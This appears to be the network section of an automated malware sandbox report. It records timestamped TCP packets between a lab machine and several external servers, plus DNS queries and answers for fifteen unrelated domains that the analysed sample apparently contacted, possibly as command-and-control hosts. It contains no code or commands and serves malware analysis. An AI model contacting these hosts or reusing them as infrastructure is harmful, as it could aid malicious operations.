                                                                                    Jan 7, 2025 15:32:48.676845074 CET8049888116.50.37.244192.168.2.5
                                                                                    Jan 7, 2025 15:32:48.677047014 CET8049888116.50.37.244192.168.2.5
                                                                                    Jan 7, 2025 15:32:48.677110910 CET4988880192.168.2.5116.50.37.244
                                                                                    Jan 7, 2025 15:32:49.289589882 CET4988880192.168.2.5116.50.37.244
                                                                                    Jan 7, 2025 15:32:50.308068037 CET4989880192.168.2.5116.50.37.244
                                                                                    Jan 7, 2025 15:32:50.312894106 CET8049898116.50.37.244192.168.2.5
                                                                                    Jan 7, 2025 15:32:50.312969923 CET4989880192.168.2.5116.50.37.244
                                                                                    Jan 7, 2025 15:32:50.314866066 CET4989880192.168.2.5116.50.37.244
                                                                                    Jan 7, 2025 15:32:50.319652081 CET8049898116.50.37.244192.168.2.5
                                                                                    Jan 7, 2025 15:32:51.192833900 CET8049898116.50.37.244192.168.2.5
                                                                                    Jan 7, 2025 15:32:51.193105936 CET8049898116.50.37.244192.168.2.5
                                                                                    Jan 7, 2025 15:32:51.193172932 CET4989880192.168.2.5116.50.37.244
                                                                                    Jan 7, 2025 15:32:51.820895910 CET4989880192.168.2.5116.50.37.244
                                                                                    Jan 7, 2025 15:32:52.839256048 CET4991780192.168.2.5116.50.37.244
                                                                                    Jan 7, 2025 15:32:52.844185114 CET8049917116.50.37.244192.168.2.5
                                                                                    Jan 7, 2025 15:32:52.844377041 CET4991780192.168.2.5116.50.37.244
                                                                                    Jan 7, 2025 15:32:52.846255064 CET4991780192.168.2.5116.50.37.244
                                                                                    Jan 7, 2025 15:32:52.851080894 CET8049917116.50.37.244192.168.2.5
                                                                                    Jan 7, 2025 15:32:52.851140976 CET8049917116.50.37.244192.168.2.5
                                                                                    Jan 7, 2025 15:32:53.748708010 CET8049917116.50.37.244192.168.2.5
                                                                                    Jan 7, 2025 15:32:53.748869896 CET8049917116.50.37.244192.168.2.5
                                                                                    Jan 7, 2025 15:32:53.748924017 CET4991780192.168.2.5116.50.37.244
                                                                                    Jan 7, 2025 15:32:54.352039099 CET4991780192.168.2.5116.50.37.244
                                                                                    Jan 7, 2025 15:32:55.370670080 CET4993380192.168.2.5116.50.37.244
                                                                                    Jan 7, 2025 15:32:55.375574112 CET8049933116.50.37.244192.168.2.5
                                                                                    Jan 7, 2025 15:32:55.375644922 CET4993380192.168.2.5116.50.37.244
                                                                                    Jan 7, 2025 15:32:55.377645016 CET4993380192.168.2.5116.50.37.244
                                                                                    Jan 7, 2025 15:32:55.382405043 CET8049933116.50.37.244192.168.2.5
                                                                                    Jan 7, 2025 15:32:56.244842052 CET8049933116.50.37.244192.168.2.5
                                                                                    Jan 7, 2025 15:32:56.244890928 CET8049933116.50.37.244192.168.2.5
                                                                                    Jan 7, 2025 15:32:56.245059013 CET4993380192.168.2.5116.50.37.244
                                                                                    Jan 7, 2025 15:32:56.247757912 CET4993380192.168.2.5116.50.37.244
                                                                                    Jan 7, 2025 15:32:56.252540112 CET8049933116.50.37.244192.168.2.5
                                                                                    Jan 7, 2025 15:33:09.440911055 CET4998180192.168.2.585.159.66.93
                                                                                    Jan 7, 2025 15:33:09.446518898 CET804998185.159.66.93192.168.2.5
                                                                                    Jan 7, 2025 15:33:09.446603060 CET4998180192.168.2.585.159.66.93
                                                                                    Jan 7, 2025 15:33:09.448369026 CET4998180192.168.2.585.159.66.93
                                                                                    Jan 7, 2025 15:33:09.455982924 CET804998185.159.66.93192.168.2.5
                                                                                    Jan 7, 2025 15:33:10.961558104 CET4998180192.168.2.585.159.66.93
                                                                                    Jan 7, 2025 15:33:10.971334934 CET804998185.159.66.93192.168.2.5
                                                                                    Jan 7, 2025 15:33:10.971512079 CET4998180192.168.2.585.159.66.93
                                                                                    Jan 7, 2025 15:33:11.980775118 CET4998280192.168.2.585.159.66.93
                                                                                    Jan 7, 2025 15:33:11.988380909 CET804998285.159.66.93192.168.2.5
                                                                                    Jan 7, 2025 15:33:11.988464117 CET4998280192.168.2.585.159.66.93
                                                                                    Jan 7, 2025 15:33:11.990180969 CET4998280192.168.2.585.159.66.93
                                                                                    Jan 7, 2025 15:33:11.997776031 CET804998285.159.66.93192.168.2.5
                                                                                    Jan 7, 2025 15:33:13.492772102 CET4998280192.168.2.585.159.66.93
                                                                                    Jan 7, 2025 15:33:13.497766018 CET804998285.159.66.93192.168.2.5
                                                                                    Jan 7, 2025 15:33:13.497840881 CET4998280192.168.2.585.159.66.93
                                                                                    Jan 7, 2025 15:33:14.521275997 CET4998380192.168.2.585.159.66.93
                                                                                    Jan 7, 2025 15:33:14.526041031 CET804998385.159.66.93192.168.2.5
                                                                                    Jan 7, 2025 15:33:14.526122093 CET4998380192.168.2.585.159.66.93
                                                                                    Jan 7, 2025 15:33:14.527900934 CET4998380192.168.2.585.159.66.93
                                                                                    Jan 7, 2025 15:33:14.532692909 CET804998385.159.66.93192.168.2.5
                                                                                    Jan 7, 2025 15:33:14.532854080 CET804998385.159.66.93192.168.2.5
                                                                                    Jan 7, 2025 15:33:16.039587975 CET4998380192.168.2.585.159.66.93
                                                                                    Jan 7, 2025 15:33:16.044708014 CET804998385.159.66.93192.168.2.5
                                                                                    Jan 7, 2025 15:33:16.044775963 CET4998380192.168.2.585.159.66.93
                                                                                    Jan 7, 2025 15:33:17.058114052 CET4998480192.168.2.585.159.66.93
                                                                                    Jan 7, 2025 15:33:17.062932968 CET804998485.159.66.93192.168.2.5
                                                                                    Jan 7, 2025 15:33:17.063832998 CET4998480192.168.2.585.159.66.93
                                                                                    Jan 7, 2025 15:33:17.065604925 CET4998480192.168.2.585.159.66.93
                                                                                    Jan 7, 2025 15:33:17.070372105 CET804998485.159.66.93192.168.2.5
                                                                                    Jan 7, 2025 15:34:17.781847954 CET804998485.159.66.93192.168.2.5
                                                                                    Jan 7, 2025 15:34:17.781877041 CET804998485.159.66.93192.168.2.5
                                                                                    Jan 7, 2025 15:34:17.782006025 CET4998480192.168.2.585.159.66.93
                                                                                    Jan 7, 2025 15:34:17.785293102 CET4998480192.168.2.585.159.66.93
                                                                                    Jan 7, 2025 15:34:17.790060043 CET804998485.159.66.93192.168.2.5
                                                                                    Jan 7, 2025 15:34:22.809374094 CET4998580192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:22.814158916 CET804998591.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:22.818226099 CET4998580192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:22.822089911 CET4998580192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:22.826850891 CET804998591.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:23.472903967 CET804998591.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:23.472943068 CET804998591.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:23.472991943 CET4998580192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:24.321012974 CET4998580192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:25.340202093 CET4998680192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:25.345129967 CET804998691.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:25.345215082 CET4998680192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:25.347731113 CET4998680192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:25.353902102 CET804998691.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:25.983161926 CET804998691.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:25.983349085 CET804998691.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:25.983412027 CET4998680192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:26.856049061 CET4998680192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:27.870575905 CET4998780192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:27.875499964 CET804998791.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:27.875567913 CET4998780192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:27.877615929 CET4998780192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:27.882450104 CET804998791.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:27.882523060 CET804998791.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:28.602495909 CET804998791.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:28.602535009 CET804998791.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:28.602989912 CET4998780192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:29.383516073 CET4998780192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:30.403557062 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:30.408524036 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:30.408622980 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:30.412012100 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:30.416795969 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.104907990 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.104932070 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.104943037 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.104958057 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.104974031 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.104988098 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.105000973 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.105012894 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.105025053 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.105079889 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.105133057 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.105206966 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.105206966 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.109899998 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.164707899 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.201948881 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.201961994 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.202023029 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.202086926 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.202090025 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.202099085 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.202133894 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.202168941 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.202179909 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.202208996 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.202827930 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.202877045 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.202883959 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.202898979 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.202909946 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.202970982 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.203329086 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.203392029 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.207237005 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.212018967 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:44.583528042 CET4998980192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:44.588439941 CET804998966.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:44.588624001 CET4998980192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:44.592056990 CET4998980192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:44.596865892 CET804998966.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:45.210248947 CET804998966.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:45.210338116 CET804998966.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:45.210378885 CET4998980192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:46.103600979 CET4998980192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:47.124166012 CET4999080192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:47.129251003 CET804999066.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:47.130161047 CET4999080192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:47.136085987 CET4999080192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:47.140929937 CET804999066.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:47.750137091 CET804999066.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:47.750152111 CET804999066.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:47.750211000 CET4999080192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:48.633546114 CET4999080192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:49.652251959 CET4999180192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:49.658830881 CET804999166.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:49.658900976 CET4999180192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:49.661007881 CET4999180192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:49.667711973 CET804999166.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:49.667727947 CET804999166.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:50.270564079 CET804999166.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:50.270586967 CET804999166.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:50.270750046 CET4999180192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:51.164940119 CET4999180192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:52.184087038 CET4999280192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:52.189049006 CET804999266.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:52.192166090 CET4999280192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:52.196084023 CET4999280192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:52.200944901 CET804999266.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:52.925978899 CET804999266.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:52.926086903 CET804999266.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:52.926156044 CET4999280192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:52.932109118 CET4999280192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:52.936927080 CET804999266.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:58.011219978 CET4999380192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:34:58.016058922 CET8049993195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:34:58.016129971 CET4999380192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:34:58.018270969 CET4999380192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:34:58.023060083 CET8049993195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:34:58.703078032 CET8049993195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:34:58.703640938 CET8049993195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:34:58.703747988 CET4999380192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:34:59.524180889 CET4999380192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:00.544357061 CET4999480192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:00.549232006 CET8049994195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:00.549413919 CET4999480192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:00.552124977 CET4999480192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:00.556952000 CET8049994195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:01.233527899 CET8049994195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:01.233555079 CET8049994195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:01.233611107 CET4999480192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:02.055592060 CET4999480192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:03.076128006 CET4999580192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:03.080935955 CET8049995195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:03.081022978 CET4999580192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:03.084131002 CET4999580192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:03.088979959 CET8049995195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:03.089047909 CET8049995195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:03.743637085 CET8049995195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:03.744030952 CET8049995195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:03.744096994 CET4999580192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:04.588135958 CET4999580192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:05.605647087 CET4999680192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:05.610452890 CET8049996195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:05.610524893 CET4999680192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:05.612638950 CET4999680192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:05.617387056 CET8049996195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:06.335695028 CET8049996195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:06.335757971 CET8049996195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:06.336025953 CET4999680192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:06.338598013 CET4999680192.168.2.5195.110.124.133
                                                                                    Jan 7, 2025 15:35:06.343327999 CET8049996195.110.124.133192.168.2.5
                                                                                    Jan 7, 2025 15:35:27.687038898 CET4999780192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:27.691837072 CET8049997217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:27.691895008 CET4999780192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:27.693969965 CET4999780192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:27.698746920 CET8049997217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:28.277826071 CET8049997217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:28.278160095 CET8049997217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:28.278314114 CET4999780192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:29.198306084 CET4999780192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:30.215039015 CET4999880192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:30.219846010 CET8049998217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:30.219921112 CET4999880192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:30.222574949 CET4999880192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:30.227452993 CET8049998217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:30.787947893 CET8049998217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:30.789027929 CET8049998217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:30.789138079 CET4999880192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:31.727489948 CET4999880192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:32.746134996 CET4999980192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:32.751326084 CET8049999217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:32.751509905 CET4999980192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:32.753498077 CET4999980192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:32.758493900 CET8049999217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:32.758507967 CET8049999217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:33.330490112 CET8049999217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:33.330504894 CET8049999217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:33.330557108 CET4999980192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:34.260225058 CET4999980192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:35.278011084 CET5000080192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:35.282903910 CET8050000217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:35.282979012 CET5000080192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:35.285566092 CET5000080192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:35.290359020 CET8050000217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:35.872658014 CET8050000217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:35.872692108 CET8050000217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:35.872705936 CET8050000217.196.55.202192.168.2.5
                                                                                    Jan 7, 2025 15:35:35.872834921 CET5000080192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:35.875871897 CET5000080192.168.2.5217.196.55.202
                                                                                    Jan 7, 2025 15:35:35.880661964 CET8050000217.196.55.202192.168.2.5

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 7, 2025 15:32:22.955933094 CET5743353192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:32:23.361741066 CET53574331.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:32:39.355140924 CET6063353192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:32:39.363625050 CET53606331.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:32:47.418051958 CET5521253192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:32:47.777664900 CET53552121.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:33:01.261496067 CET5153253192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:33:01.273639917 CET53515321.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:33:09.339912891 CET4969053192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:33:09.438405037 CET53496901.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:34:22.794219017 CET5661953192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:34:22.807137966 CET53566191.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:34:36.216028929 CET6173553192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:34:36.246231079 CET53617351.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:34:44.311588049 CET5894153192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:34:44.581171036 CET53589411.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:34:57.936517000 CET6295753192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:34:58.008301020 CET53629571.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:35:11.355808973 CET5542953192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:35:11.366904974 CET53554291.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:35:19.437757015 CET5978053192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:35:19.580524921 CET53597801.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:35:27.638637066 CET5456953192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:35:27.683727026 CET53545691.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:35:40.887833118 CET5704353192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:35:40.897267103 CET53570431.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:35:48.950599909 CET5785053192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:35:48.959638119 CET53578501.1.1.1192.168.2.5
                                                                                    Jan 7, 2025 15:35:57.043489933 CET6120853192.168.2.51.1.1.1
                                                                                    Jan 7, 2025 15:35:57.054841995 CET53612081.1.1.1192.168.2.5

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Jan 7, 2025 15:32:22.955933094 CET192.168.2.51.1.1.10xf46dStandard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:32:39.355140924 CET192.168.2.51.1.1.10xa518Standard query (0)www.kasegitai.tokyoA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:32:47.418051958 CET192.168.2.51.1.1.10xa04Standard query (0)www.goldenjade-travel.comA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:33:01.261496067 CET192.168.2.51.1.1.10xeae2Standard query (0)www.antonio-vivaldi.mobiA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:33:09.339912891 CET192.168.2.51.1.1.10x2059Standard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:34:22.794219017 CET192.168.2.51.1.1.10x1a64Standard query (0)www.rssnewscast.comA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:34:36.216028929 CET192.168.2.51.1.1.10x7c4eStandard query (0)www.liangyuen528.comA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:34:44.311588049 CET192.168.2.51.1.1.10x654Standard query (0)www.techchains.infoA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:34:57.936517000 CET192.168.2.51.1.1.10x6b99Standard query (0)www.elettrosistemista.zipA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:35:11.355808973 CET192.168.2.51.1.1.10xacf6Standard query (0)www.donnavariedades.comA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:35:19.437757015 CET192.168.2.51.1.1.10x461eStandard query (0)www.660danm.topA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:35:27.638637066 CET192.168.2.51.1.1.10xf65aStandard query (0)www.empowermedeco.comA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:35:40.887833118 CET192.168.2.51.1.1.10x14ddStandard query (0)www.joyesi.xyzA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:35:48.950599909 CET192.168.2.51.1.1.10x6bb3Standard query (0)www.k9vyp11no3.cfdA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:35:57.043489933 CET192.168.2.51.1.1.10xe2acStandard query (0)www.shenzhoucui.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Jan 7, 2025 15:32:23.361741066 CET1.1.1.1192.168.2.50xf46dNo error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:32:39.363625050 CET1.1.1.1192.168.2.50xa518Name error (3)www.kasegitai.tokyononenoneA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:32:47.777664900 CET1.1.1.1192.168.2.50xa04No error (0)www.goldenjade-travel.com116.50.37.244A (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:33:01.273639917 CET1.1.1.1192.168.2.50xeae2Name error (3)www.antonio-vivaldi.mobinonenoneA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:33:09.438405037 CET1.1.1.1192.168.2.50x2059No error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Jan 7, 2025 15:33:09.438405037 CET1.1.1.1192.168.2.50x2059No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Jan 7, 2025 15:33:09.438405037 CET1.1.1.1192.168.2.50x2059No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:34:22.807137966 CET1.1.1.1192.168.2.50x1a64No error (0)www.rssnewscast.com91.195.240.94A (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:34:36.246231079 CET1.1.1.1192.168.2.50x7c4eName error (3)www.liangyuen528.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:34:44.581171036 CET1.1.1.1192.168.2.50x654No error (0)www.techchains.info66.29.149.46A (IP address)IN (0x0001)false
